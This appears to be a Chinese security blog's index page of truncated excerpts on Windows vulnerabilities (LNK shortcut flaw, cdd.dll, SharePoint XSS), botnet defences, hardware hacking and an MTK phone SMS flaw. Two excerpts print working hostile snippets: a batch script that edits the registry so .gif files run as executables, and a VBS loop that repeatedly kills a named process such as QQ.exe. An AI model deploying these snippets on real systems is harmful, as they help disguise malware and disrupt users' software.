Pray's Blog

日前微软发布安全通告，称其正在调查一个几乎涉及全系Windows操作系统的远程代码执行漏洞（CVE编号：CVE-2010- 2568）。该漏洞存在于“Windows Shell”组件中，当受影响系统用户点击或者Windows Shell试图加载经过精心构造的恶意快捷方式图标时，由于Windows Shell没有验证指定的参数，可导致恶意代码在本地运行。 反病毒专家介绍，微软公布了两个临时解决方案，暂未推出正式补丁。电脑用户可采用微软临时解决方法，避免系统遭到利用该漏洞的恶意代码攻击。 临时解决方案一：通过修改...阅读更多

在其它影响因素相同的情况下，简单的解决方案是最安全的。 在开发软件时间，代码写的越多，出现错误的几率也就越大。在统计学上代码行数和错误数量之间是存在简单对应的关系的：代码越多，错误越多。由于很多（不是全部）的错误可以被当作安全方面的脆弱点予以利用，因此，对于单一软件来说系统开发量就可以对安全造成重大影响。 在为软件系统添加功能时，不论需要多少行代码来执行这些功能，都有可能导致错误的出现。这是因为系统中不同功能块的相互作用，有时会产生惊人的效果，...阅读更多

　　据国外媒体报道，微软正在开发一款补丁软件，修正64位Windows7图形显示组件中一处缺陷。黑客可以利用该缺陷使系统崩溃或远程控制系统。 　　微软正在调查WindowsCanonicalDisplayDriver(cdd.dll)中一处缺陷，该缺陷影响64位版Windows7、WindowsServer2008R2和支持安腾芯片的WindowsServer2008R2。微软代表称，该公司正在开发补丁软件，将在完成测试后发布这款补丁软件。 　　家庭高级版、商业版、企业版、旗舰版Windows7用户可以禁用WindowsAero，防止因该缺陷受到攻击。该缺...阅读更多

微软安全应急小组确认了微软SharePoint Server 2007产品中的严重跨站脚本漏洞(XSS)的存在。 该漏洞可以通过浏览器被利用，使黑客通过漏洞程序执行任意的JavaScript代码。该漏洞的具体细节已经被公布，微软预计在本周末发布的安全报告上将 提供补丁修复这一漏洞。 下面是关于这个漏洞的一些细节： 该漏洞是没有正确的处理“/_layouts/help.aspx”脚本，来清除用户输入的“cid0”变量。成功利用该漏洞的攻击将导致应用程序挂起，基于Cookies的信息将可能泄露，用户敏感数据将可能遭到篡改...阅读更多

如更改exe为gif： 1 2 3 4 5 6 7 8 @echo off color 1A ECHO Windows Registry Editor Version 5.00>gif.reg ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.gif]>>gif.reg ECHO "Content Type"="application/x-msdownload">>gif.reg ECHO @="exefile">>gif.reg regedit /s gif.reg>nul 2>nul del /s gif.reg>nul 2>nul 这个代码保存成.BAT的文件。 先运行这个BAT文件系统会把.GIF文件来当做应用程序来运行...阅读更多

僵尸网络(Botnet)是指多台被恶意代码感染、控制的与互联网相连接的计算机。Botnet正成为一种日益严重的威胁，不过，只要我们用好对付它的六把利剑，僵尸网络就难以造成严重的祸患。  　　第一：采用Web过滤服务  　　Web过滤服务是迎战僵尸网络的最有力武器。这些服务扫描Web站点发出的不正常的行为，或者扫描已知的恶意活动，并且阻止这些站点与用户接触。  　　Websense、Cyveillance 、FaceTime都是很好的例子。它们都可以实时地监视互联网，并查找从事恶意的或可疑的活动的站点...阅读更多

    一、硬件安全     利用硬件的黑客技术虽然报道不多，但它的的确确出现了：在BIOS芯片中植入病毒木马，让目前的防火墙、防毒软件都失效; 针对主机板上的电磁辐射进行信息获取的技术……仅仅使用软件非法侵入的方式可能已经落伍，新时期的黑客技术应包括破解硬件本身。前几年微软公司曾经对硬件 黑客侵犯其Xbox设备的行为采取法律与技术措施。索尼公司的PS2游戏机也成为一些专门修改芯片的黑客目标，其核心技术Sony的记忆棒被破解。美国苹 果公司新推出的iPhone 3Gs的加密系统也被...阅读更多

TechWeb旗下的DarkReading发表文章，透露iDefense已经收回之前发布的Adobe PDF漏洞导致Google被攻击的声明，承认McAfee所说的IE漏洞才是祸源。 文章还给出了一个链接，指向开源渗透测试工具项目Metasploit的博客，上面给出了利用这个IE漏洞的攻击代码链接。代码如下： 去混淆后的代码 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64...阅读更多

影响手机品牌：所有MTK方案手机（也就是我们常说的山寨手机） 且 写短信时有【“选项”——“插入对象”——“我的铃声”】这一功能（大部分山寨手机都有此功能） 漏洞原理： 在大部分MTK方案手机中，编写短信息的时候可以插入一种“imy”格式的铃声文件， 而具有同样功能的手机接收到此短信后在查看信息内容的同时可以听到短信息内插入的铃声 由于MTK方案手机在阅读短信息的时候对“imy”文件内容不经过过滤而直接执行。 所以我们可以在“imy”文件内插入代码，通过代码调用手机的解码芯片发出一些...阅读更多

用vbs查找系统进程，发现qq的进程则杀掉就是这段代码的原理 1 2 3 4 5 6 7 8 9 10 dim bag,pipe,honker,good do good="." set bag=getobject("winmgmts:\\"&good&"\root\cimv2") set pipe=bag.execquery("select * from win32_process where name='QQ.exe'") for each i in pipe i.terminate() next wscript.sleep 1 loop 大家注意到了上边的QQ.EXE了吧，这个是可以改成其他的，所以这里不单独针对QQ！ 文章地...阅读更多